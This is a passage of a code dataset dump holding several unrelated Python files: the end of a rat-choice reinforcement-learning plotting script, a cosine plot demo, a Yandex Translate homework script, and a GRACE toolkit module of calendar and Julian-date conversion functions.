session_df[\"Sequence\"].iloc[i]\n res_trial = session_df[\"Response\"].iloc[i]\n reward = session_df[\"Correct\"].iloc[i]\n if res_trial in [\"L\", \"R\"]:\n rat.upgradeValues(seq_trial, res_trial, reward)\n if seq_trial == \"A\":\n seqA_X.append(i)\n seqA_Y.append(reward)\n else:\n seqB_X.append(i)\n seqB_Y.append(reward)\n # other parameter for plot\n x_plot = np.arange(len(session_df))\n\n # Sequence A Values\n fig = plt.figure(figsize=(12, 6), dpi=200)\n ax1 = fig.add_subplot(1, 1, 1)\n if subject_no <= 16:\n ax1.plot(x_plot, np.array(rat.values_history[0][0]), \"b\")\n ax1.plot(x_plot, np.array(rat.values_history[0][1]), \"r\")\n else:\n ax1.plot(x_plot, np.array(rat.values_history[0][0]), \"r\")\n ax1.plot(x_plot, np.array(rat.values_history[0][1]), \"b\")\n colormap = [\"r\", \"b\"]\n shapemap = [\"x\", \"o\"]\n for x, y in zip(seqA_X, seqA_Y):\n ax1.scatter(x, (y-0.5) * 1.05 + 0.5, color=colormap[y], marker=shapemap[y], s=5)\n ax1.set_xlabel(\"Sequences A Values\", fontsize=12)\n ax1.set_ylim([-0.03,1.03])\n ax1.set_xlim([0, n_trials])\n ax1.grid()\n filename = os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no), \"SequenceA_Mode{m}.png\".format(m=mode))\n plt.savefig(filename)\n plt.close(fig)\n\n # Sequence B Values\n fig = plt.figure(figsize=(12, 6), dpi=200)\n ax2 = fig.add_subplot(1, 1, 1)\n if subject_no <= 16:\n ax2.plot(x_plot, np.array(rat.values_history[1][0]), \"r\")\n ax2.plot(x_plot, np.array(rat.values_history[1][1]), \"b\")\n else:\n ax2.plot(x_plot, np.array(rat.values_history[1][0]), \"b\")\n ax2.plot(x_plot, np.array(rat.values_history[1][1]), \"r\")\n colormap = [\"r\", \"b\"]\n shapemap = [\"x\", \"o\"]\n for x, y in zip(seqB_X, seqB_Y):\n ax2.scatter(x, (y-0.5) * 1.05 + 0.5, color=colormap[y], marker=shapemap[y], s=5)\n ax2.set_xlabel(\"Sequences B Values\", fontsize=12)\n ax2.set_ylim([-0.03,1.03])\n ax2.set_xlim([0, n_trials])\n ax2.grid()\n filename = os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no), \"SequenceB_Mode{m}.png\".format(m=mode))\n plt.savefig(filename)\n plt.close(fig)\n\n df2add = pd.DataFrame([values], columns=columns)\n df_sum = df_sum.append(df2add, ignore_index=True)\n\nwith open(os.path.join(rootpath, \"Summary.csv\"), \"w\") as f:\n f.write(df_sum.to_csv(index=False))\n\n\n\n\n\n", "repo_name": "HaoyuFan-DIB/RatChoice", "sub_path": "RL_Model/RL_Model.py", "file_name": "RL_Model.py", "file_ext": "py", "file_size_in_byte": 14389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.exp", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": 
"attribute"}, {"api_name": "os.mkdir", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 161, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 202, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 300, "usage_type": "call"}, {"api_name": "os.path", "line_number": 300, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.close", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 304, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}]} +{"seq_id": "5197869489", "text": "import matplotlib.pyplot as plot\nimport numpy as np\n\nx = np.arange(0, 10, 0.1)\ny = np.cos(1*x)\nz = np.cos(3*x)\n\nplot.plot(x,y)\nplot.plot(x,z)\nplot.show()\n\n", "repo_name": "esineokov/ml", "sub_path": "math/lesson/1/4.py", "file_name": "4.py", "file_ext": "py", "file_size_in_byte": 155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.arange", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "34211031227", "text": "import requests\n# документация https://yandex.ru/dev/translate/doc/dg/reference/translate-docpage/\n\nAPI_KEY = ''\nURL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n\ndef translate_it(text, lang, to_lang):\n \"\"\"\n https://translate.yandex.net/api/v1.5/tr.json/translate ?\n key=\n & text=<переводимый текст>\n & lang=<направление перевода>\n & [format=<формат текста>]\n & [options=<опции перевода>]\n & [callback=<имя callback-функции>]\n :param to_lang:\n :return:\n \"\"\"\n\n params = {\n 'key': API_KEY,\n 'text': text,\n 'lang': '{}-{}'.format(lang, to_lang),\n }\n\n response = requests.get(URL, params=params)\n json_ = response.json()\n return ''.join(json_['text'])\n\n\n# print(translate_it('В настоящее время доступна единственная опция — признак включения в ответ автоматически определенного языка переводимого текста. 
\n# Этому соответствует значение 1 этого параметра.', 'no'))\n\ndef open_txt(file_name):\n with open(file_name, 'r', encoding='utf-8') as f:\n data = [l.strip() for l in f]\n return data\n\ndef write_txt(file_name, data):\n with open(file_name, 'w', encoding='utf-8') as f:\n f.write(data)\n\n\ntranslated_data_de = translate_it(open_txt('DE.txt'), 'de', 'ru')\nprint(translated_data_de)\nwrite_txt('TranslatedDE.txt', translated_data_de)\n\ntranslated_data_es = translate_it(open_txt('ES.txt'), 'es', 'ru')\nprint(translated_data_es)\nwrite_txt('TranslatedES.txt', translated_data_es)\n\ntranslated_data_fr = translate_it(open_txt('FR.txt'), 'fr', 'ru')\nprint(translated_data_fr)\nwrite_txt('TranslatedFR.txt', translated_data_fr)\n\n\n", "repo_name": "m1amgn/ya_api_translate", "sub_path": "yandex_translate_hw.py", "file_name": "yandex_translate_hw.py", "file_ext": "py", "file_size_in_byte": 1879, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "18913289060", "text": "#!/usr/bin/env python\nu\"\"\"\ntime.py\nWritten by Tyler Sutterley (11/2021)\nUtilities for calculating time operations\n\nPYTHON DEPENDENCIES:\n numpy: Scientific Computing Tools For Python\n https://numpy.org\n dateutil: powerful extensions to datetime\n https://dateutil.readthedocs.io/en/stable/\n\nUPDATE HISTORY:\n Updated 11/2021: added function for calendar year (decimal) to Julian Day \n Updated 09/2021: add functions for converting to and from GRACE months\n Updated 05/2021: define int/float precision to prevent deprecation warning\n Updated 02/2021: added adjust_months function to fix special months cases\n Updated 01/2021: add date parser for cases when only a date and no units\n Updated 12/2020: merged with convert_julian and convert_calendar_decimal\n added calendar_days routine to get number of days per month\n Updated 09/2020: parse date strings \"time-units since yyyy-mm-dd hh:mm:ss\"\n Updated 08/2020: added NASA Earthdata routines for downloading from CDDIS\n Written 07/2020\n\"\"\"\nimport datetime\nimport numpy as np\nimport dateutil.parser\n\n#-- PURPOSE: parse a date string into epoch and units scale\ndef parse_date_string(date_string):\n \"\"\"\n parse a date string of the form time-units since yyyy-mm-dd hh:mm:ss\n\n Arguments\n ---------\n date_string: time-units since yyyy-mm-dd hh:mm:ss\n\n Returns\n -------\n epoch of delta time\n multiplication factor to convert to seconds\n \"\"\"\n #-- try parsing the original date string as a date\n try:\n epoch = dateutil.parser.parse(date_string)\n except ValueError:\n pass\n else:\n #-- return the epoch (as list)\n return (datetime_to_list(epoch),0.0)\n #-- split the date string into units and epoch\n units,epoch = split_date_string(date_string)\n conversion_factors = {'microseconds': 1e-6,'microsecond': 1e-6,\n 'microsec': 1e-6,'microsecs': 1e-6,\n 'milliseconds': 1e-3,'millisecond': 1e-3,'millisec': 1e-3,\n 'millisecs': 1e-3,'msec': 1e-3,'msecs': 1e-3,'ms': 1e-3,\n 'seconds': 1.0,'second': 1.0,'sec': 1.0,'secs': 1.0,'s': 1.0,\n 'minutes': 60.0,'minute': 60.0,'min': 60.0,'mins': 60.0,\n 'hours': 3600.0,'hour': 3600.0,'hr': 3600.0,\n 'hrs': 3600.0,'h': 3600.0,\n 'day': 86400.0,'days': 86400.0,'d': 86400.0}\n if units not in conversion_factors.keys():\n raise ValueError('Invalid units: {0}'.format(units))\n #-- return the epoch (as list) and the time unit conversion factors\n return 
(datetime_to_list(epoch),conversion_factors[units])\n\n#-- PURPOSE: split a date string into units and epoch\ndef split_date_string(date_string):\n \"\"\"\n split a date string into units and epoch\n\n Arguments\n ---------\n date_string: time-units since yyyy-mm-dd hh:mm:ss\n \"\"\"\n try:\n units,_,epoch = date_string.split(None,2)\n except ValueError:\n raise ValueError('Invalid format: {0}'.format(date_string))\n else:\n return (units.lower(),dateutil.parser.parse(epoch))\n\n#-- PURPOSE: convert a datetime object into a list\ndef datetime_to_list(date):\n \"\"\"\n convert a datetime object into a list [year,month,day,hour,minute,second]\n\n Arguments\n ---------\n date: datetime object\n \"\"\"\n return [date.year,date.month,date.day,date.hour,date.minute,date.second]\n\n#-- PURPOSE: Adjust GRACE/GRACE-FO months to fix \"Special Cases\"\ndef adjust_months(grace_month):\n \"\"\"\n Adjust estimated GRACE/GRACE-FO months to fix \"Special Cases\"\n\n Arguments\n ---------\n grace_month: GRACE/GRACE-FO months\n\n The \"Special Months\" (Nov 2011, Dec 2011 and April 2012) with\n Accelerometer shutoffs make the relation between month number\n and date more complicated as days from other months are used\n For CSR and GFZ: Nov 2011 (119) is centered in Oct 2011 (118)\n For JPL: Dec 2011 (120) is centered in Jan 2012 (121)\n For all: May 2015 (161) is centered in Apr 2015 (160)\n For GSFC: Oct 2018 (202) is centered in Nov 2018 (203)\n \"\"\"\n #-- verify dimensions\n grace_month = np.atleast_1d(grace_month)\n #-- number of months\n nmon = len(grace_month)\n #-- create temporary months object\n m = np.zeros_like(grace_month)\n #-- find unique months\n _,i,c = np.unique(grace_month,return_inverse=True,return_counts=True)\n #-- simple unique months case\n case1, = np.nonzero(c[i] == 1)\n m[case1] = grace_month[case1]\n #-- Special Months cases\n case2, = np.nonzero(c[i] == 2)\n #-- for each special case month\n for j in case2:\n # prior month, current month, subsequent 2 months\n mm1 = grace_month[j-1]\n mon = grace_month[j]\n mp1 = grace_month[j+1] if (j < (nmon-1)) else (mon + 1)\n mp2 = grace_month[j+2] if (j < (nmon-2)) else (mp1 + 1)\n #-- determine the months which meet the criteria need to be adjusted\n if (mon == (mm1 + 1)):\n #-- case where month is correct\n #-- but subsequent month needs to be +1\n m[j] = np.copy(grace_month[j])\n elif (mon == mm1) and (mon != m[j-1]):\n #-- case where prior month needed to be -1\n #-- but current month is correct\n m[j] = np.copy(grace_month[j])\n elif (mon == mm1):\n #-- case where month should be +1\n m[j] = grace_month[j] + 1\n elif (mon == mp1) and ((mon == (mm1 + 2)) or (mp2 == (mp1 + 1))):\n #-- case where month should be -1\n m[j] = grace_month[j] - 1\n #-- update months and remove singleton dimensions if necessary\n return np.squeeze(m)\n\n#-- PURPOSE: convert calendar dates to GRACE/GRACE-FO months\ndef calendar_to_grace(year,month=1,around=np.floor):\n \"\"\"\n Converts calendar dates to GRACE/GRACE-FO months\n\n Arguments\n ---------\n year: calendar year\n\n Keyword arguments\n -----------------\n month: calendar month\n around: method of rounding to nearest method\n\n Returns\n -------\n grace_month: GRACE/GRACE-FO month\n \"\"\"\n grace_month = around(12.0*(year - 2002.0)) + month\n return np.array(grace_month,dtype=int)\n\n#-- PURPOSE: convert GRACE/GRACE-FO months to calendar dates\ndef grace_to_calendar(grace_month):\n \"\"\"\n Converts GRACE/GRACE-FO months to calendar dates\n\n Arguments\n ---------\n grace_month: GRACE/GRACE-FO 
month\n\n Returns\n -------\n year: calendar year\n month: calendar month\n \"\"\"\n year = np.array(2002 + (grace_month-1)//12).astype(int)\n month = np.mod(grace_month-1,12) + 1\n return (year, month)\n\n#-- PURPOSE: convert calendar dates to Julian days\ndef calendar_to_julian(year_decimal):\n \"\"\"\n Converts calendar dates to Julian days\n\n Arguments\n ---------\n year: calendar year\n\n Returns\n -------\n JD: Julian Day (days since 01-01-4713 BCE at 12:00:00)\n \"\"\"\n #-- calculate year\n year = np.floor(year_decimal)\n #-- calculation of day of the year\n dpy = calendar_days(year).sum()\n DofY = dpy*(year_decimal % 1)\n #-- Calculation of the Julian date from year and DofY\n JD = np.array(367.0*year - np.floor(7.0*year/4.0) -\n np.floor(3.0*(np.floor((7.0*year - 1.0)/700.0) + 1.0)/4.0) +\n DofY + 1721058.5, dtype=np.float64)\n return JD\n\n#-- PURPOSE: gets the number of days per month for a given year\ndef calendar_days(year):\n \"\"\"\n Calculates the number of days per month for a given year\n\n Arguments\n ---------\n year: calendar year\n\n Returns\n -------\n dpm: number of days for each month\n \"\"\"\n #-- days per month in a leap and a standard year\n #-- only difference is February (29 vs. 28)\n dpm_leap = np.array([31,29,31,30,31,30,31,31,30,31,30,31],dtype=np.float64)\n dpm_stnd = np.array([31,28,31,30,31,30,31,31,30,31,30,31],dtype=np.float64)\n #-- Rules in the Gregorian calendar for a year to be a leap year:\n #-- divisible by 4, but not by 100 unless divisible by 400\n #-- True length of the year is about 365.2422 days\n #-- Adding a leap day every four years ==> average 365.25\n #-- Subtracting a leap year every 100 years ==> average 365.24\n #-- Adding a leap year back every 400 years ==> average 365.2425\n #-- Subtracting a leap year every 4000 years ==> average 365.24225\n m4 = (year % 4)\n m100 = (year % 100)\n m400 = (year % 400)\n m4000 = (year % 4000)\n #-- find indices for standard years and leap years using criteria\n if ((m4 == 0) & (m100 != 0) | (m400 == 0) & (m4000 != 0)):\n return dpm_leap\n elif ((m4 != 0) | (m100 == 0) & (m400 != 0) | (m4000 == 0)):\n return dpm_stnd\n\n#-- PURPOSE: convert times from seconds since epoch1 to time since epoch2\ndef convert_delta_time(delta_time, epoch1=None, epoch2=None, scale=1.0):\n \"\"\"\n Convert delta time from seconds since epoch1 to time since epoch2\n\n Arguments\n ---------\n delta_time: seconds since epoch1\n\n Keyword arguments\n -----------------\n epoch1: epoch for input delta_time\n epoch2: epoch for output delta_time\n scale: scaling factor for converting time to output units\n \"\"\"\n epoch1 = datetime.datetime(*epoch1)\n epoch2 = datetime.datetime(*epoch2)\n delta_time_epochs = (epoch2 - epoch1).total_seconds()\n #-- subtract difference in time and rescale to output units\n return scale*(delta_time - delta_time_epochs)\n\n#-- PURPOSE: calculate the delta time from calendar date\n#-- http://scienceworld.wolfram.com/astronomy/JulianDate.html\ndef convert_calendar_dates(year, month, day, hour=0.0, minute=0.0, second=0.0,\n epoch=(1992,1,1,0,0,0), scale=1.0):\n \"\"\"\n Calculate the time in time units since epoch from calendar dates\n\n Arguments\n ---------\n year: calendar month\n month: month of the year\n day: day of the month\n\n Keyword arguments\n -----------------\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n epoch: epoch for output delta_time\n scale: scaling factor for converting days to output units\n\n Returns\n -------\n delta_time: days since 
epoch\n \"\"\"\n #-- calculate date in Modified Julian Days (MJD) from calendar date\n #-- MJD: days since November 17, 1858 (1858-11-17T00:00:00)\n MJD = 367.0*year - np.floor(7.0*(year + np.floor((month+9.0)/12.0))/4.0) - \\\n np.floor(3.0*(np.floor((year + (month - 9.0)/7.0)/100.0) + 1.0)/4.0) + \\\n np.floor(275.0*month/9.0) + day + hour/24.0 + minute/1440.0 + \\\n second/86400.0 + 1721028.5 - 2400000.5\n epoch1 = datetime.datetime(1858,11,17,0,0,0)\n epoch2 = datetime.datetime(*epoch)\n delta_time_epochs = (epoch2 - epoch1).total_seconds()\n #-- return the date in days since epoch (or scaled to units)\n return scale*np.array(MJD - delta_time_epochs/86400.0,dtype=np.float64)\n\n#-- PURPOSE: Converts from calendar dates into decimal years\ndef convert_calendar_decimal(year, month, day=None, hour=None, minute=None,\n second=None, DofY=None):\n \"\"\"\n Converts from calendar date into decimal years taking into\n account leap years\n\n Dershowitz, N. and E.M. Reingold. 2008. Calendrical Calculations.\n Cambridge: Cambridge University Press.\n\n Arguments\n ---------\n year: calendar year\n month: calendar month\n\n Keyword arguments\n -----------------\n day: day of the month\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n DofY: day of the year (January 1 = 1)\n\n Returns\n -------\n t_date: date in decimal-year format\n \"\"\"\n\n #-- number of dates\n n_dates = len(np.atleast_1d(year))\n\n #-- create arrays for calendar date variables\n cal_date = {}\n cal_date['year'] = np.zeros((n_dates))\n cal_date['month'] = np.zeros((n_dates))\n cal_date['day'] = np.zeros((n_dates))\n cal_date['hour'] = np.zeros((n_dates))\n cal_date['minute'] = np.zeros((n_dates))\n cal_date['second'] = np.zeros((n_dates))\n #-- day of the year\n cal_date['DofY'] = np.zeros((n_dates))\n\n #-- remove singleton dimensions and use year and month\n cal_date['year'][:] = np.squeeze(year)\n cal_date['month'][:] = np.squeeze(month)\n\n #-- create output date variable\n t_date = np.zeros((n_dates))\n\n #-- days per month in a leap and a standard year\n #-- only difference is February (29 vs. 
28)\n dpm_leap=np.array([31,29,31,30,31,30,31,31,30,31,30,31], dtype=np.float64)\n dpm_stnd=np.array([31,28,31,30,31,30,31,31,30,31,30,31], dtype=np.float64)\n\n #-- Rules in the Gregorian calendar for a year to be a leap year:\n #-- divisible by 4, but not by 100 unless divisible by 400\n #-- True length of the year is about 365.2422 days\n #-- Adding a leap day every four years ==> average 365.25\n #-- Subtracting a leap year every 100 years ==> average 365.24\n #-- Adding a leap year back every 400 years ==> average 365.2425\n #-- Subtracting a leap year every 4000 years ==> average 365.24225\n m4 = (cal_date['year'] % 4)\n m100 = (cal_date['year'] % 100)\n m400 = (cal_date['year'] % 400)\n m4000 = (cal_date['year'] % 4000)\n #-- find indices for standard years and leap years using criteria\n leap, = np.nonzero((m4 == 0) & (m100 != 0) | (m400 == 0) & (m4000 != 0))\n stnd, = np.nonzero((m4 != 0) | (m100 == 0) & (m400 != 0) | (m4000 == 0))\n\n #-- calculate the day of the year\n if DofY is not None:\n #-- if entered directly as an input\n #-- remove 1 so day 1 (Jan 1st) = 0.0 in decimal format\n cal_date['DofY'][:] = np.squeeze(DofY)-1\n else:\n #-- use calendar month and day of the month to calculate day of the year\n #-- month minus 1: January = 0, February = 1, etc (indice of month)\n #-- in decimal form: January = 0.0\n month_m1 = np.array(cal_date['month'],dtype=np.int64) - 1\n\n #-- day of month\n if day is not None:\n #-- remove 1 so 1st day of month = 0.0 in decimal format\n cal_date['day'][:] = np.squeeze(day)-1.0\n else:\n #-- if not entering days as an input\n #-- will use the mid-month value\n cal_date['day'][leap] = dpm_leap[month_m1[leap]]/2.0\n cal_date['day'][stnd] = dpm_stnd[month_m1[stnd]]/2.0\n\n #-- create matrix with the lower half = 1\n #-- this matrix will be used in a matrix multiplication\n #-- to calculate the total number of days for prior months\n #-- the -1 will make the diagonal == 0\n #-- i.e. first row == all zeros and the\n #-- last row == ones for all but the last element\n mon_mat=np.tri(12,12,-1)\n #-- using a dot product to calculate total number of days\n #-- for the months before the input date\n #-- basically is sum(i*dpm)\n #-- where i is 1 for all months < the month of interest\n #-- and i is 0 for all months >= the month of interest\n #-- month of interest is zero as the exact days will be\n #-- used to calculate the date\n\n #-- calculate the day of the year for leap and standard\n #-- use total days of all months before date\n #-- and add number of days before date in month\n cal_date['DofY'][stnd] = cal_date['day'][stnd] + \\\n np.dot(mon_mat[month_m1[stnd],:],dpm_stnd)\n cal_date['DofY'][leap] = cal_date['day'][leap] + \\\n np.dot(mon_mat[month_m1[leap],:],dpm_leap)\n\n #-- hour of day (else is zero)\n if hour is not None:\n cal_date['hour'][:] = np.squeeze(hour)\n\n #-- minute of hour (else is zero)\n if minute is not None:\n cal_date['minute'][:] = np.squeeze(minute)\n\n #-- second in minute (else is zero)\n if second is not None:\n cal_date['second'][:] = np.squeeze(second)\n\n #-- calculate decimal date\n #-- convert hours, minutes and seconds into days\n #-- convert calculated fractional days into decimal fractions of the year\n #-- Leap years\n t_date[leap] = cal_date['year'][leap] + \\\n (cal_date['DofY'][leap] + cal_date['hour'][leap]/24. + \\\n cal_date['minute'][leap]/1440. 
+ \\\n cal_date['second'][leap]/86400.)/np.sum(dpm_leap)\n #-- Standard years\n t_date[stnd] = cal_date['year'][stnd] + \\\n (cal_date['DofY'][stnd] + cal_date['hour'][stnd]/24. + \\\n cal_date['minute'][stnd]/1440. + \\\n cal_date['second'][stnd]/86400.)/np.sum(dpm_stnd)\n\n return t_date\n\n#-- PURPOSE: Converts from Julian day to calendar date and time\ndef convert_julian(JD, ASTYPE=None, FORMAT='dict'):\n \"\"\"\n Converts from Julian day to calendar date and time\n\n Translated from caldat in \"Numerical Recipes in C\", by William H. Press,\n Brian P. Flannery, Saul A. Teukolsky, and William T. Vetterling.\n Cambridge University Press, 1988 (second printing).\n Hatcher, D. A., \"Simple Formulae for Julian Day Numbers and Calendar Dates\",\n Quarterly Journal of the Royal Astronomical Society, 25(1), 1984.\n\n\n Arguments\n ---------\n JD: Julian Day (days since 01-01-4713 BCE at 12:00:00)\n\n Keyword arguments\n -----------------\n ASTYPE: convert output to variable type\n FORMAT: format of output variables\n 'dict': dictionary with variable keys\n 'tuple': tuple with variable order YEAR,MONTH,DAY,HOUR,MINUTE,SECOND\n 'zip': aggregated variable sets\n\n Returns\n -------\n year: calendar year\n month: calendar month\n day: day of the month\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n \"\"\"\n\n #-- convert to array if only a single value was imported\n if (np.ndim(JD) == 0):\n JD = np.atleast_1d(JD)\n SINGLE_VALUE = True\n else:\n SINGLE_VALUE = False\n\n JDO = np.floor(JD + 0.5)\n C = np.zeros_like(JD)\n #-- calculate C for dates before and after the switch to Gregorian\n IGREG = 2299161.0\n ind1, = np.nonzero(JDO < IGREG)\n C[ind1] = JDO[ind1] + 1524.0\n ind2, = np.nonzero(JDO >= IGREG)\n B = np.floor((JDO[ind2] - 1867216.25)/36524.25)\n C[ind2] = JDO[ind2] + B - np.floor(B/4.0) + 1525.0\n #-- calculate coefficients for date conversion\n D = np.floor((C - 122.1)/365.25)\n E = np.floor((365.0 * D) + np.floor(D/4.0))\n F = np.floor((C - E)/30.6001)\n #-- calculate day, month, year and hour\n DAY = np.floor(C - E + 0.5) - np.floor(30.6001*F)\n MONTH = F - 1.0 - 12.0*np.floor(F/14.0)\n YEAR = D - 4715.0 - np.floor((7.0+MONTH)/10.0)\n HOUR = np.floor(24.0*(JD + 0.5 - JDO))\n #-- calculate minute and second\n G = (JD + 0.5 - JDO) - HOUR/24.0\n MINUTE = np.floor(G*1440.0)\n SECOND = (G - MINUTE/1440.0) * 86400.0\n\n #-- convert all variables to output type (from float)\n if ASTYPE is not None:\n YEAR = YEAR.astype(ASTYPE)\n MONTH = MONTH.astype(ASTYPE)\n DAY = DAY.astype(ASTYPE)\n HOUR = HOUR.astype(ASTYPE)\n MINUTE = MINUTE.astype(ASTYPE)\n SECOND = SECOND.astype(ASTYPE)\n\n #-- if only a single value was imported initially: remove singleton dims\n if SINGLE_VALUE:\n YEAR = YEAR.item(0)\n MONTH = MONTH.item(0)\n DAY = DAY.item(0)\n HOUR = HOUR.item(0)\n MINUTE = MINUTE.item(0)\n SECOND = SECOND.item(0)\n\n #-- return date variables in output format (default python dictionary)\n if (FORMAT == 'dict'):\n return dict(year=YEAR, month=MONTH, day=DAY,\n hour=HOUR, minute=MINUTE, second=SECOND)\n elif (FORMAT == 'tuple'):\n return (YEAR, MONTH, DAY, HOUR, MINUTE, SECOND)\n elif (FORMAT == 'zip'):\n return zip(YEAR, MONTH, DAY, HOUR, MINUTE, SECOND)\n", "repo_name": "geodeepak/GRACE_HYDL", "sub_path": "gravity_toolkit/time.py", "file_name": "time.py", "file_ext": "py", "file_size_in_byte": 19484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": 
"dateutil.parser.parser.parse", "line_number": 45, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 45, "usage_type": "name"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 81, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 81, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.atleast_1d", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float64", 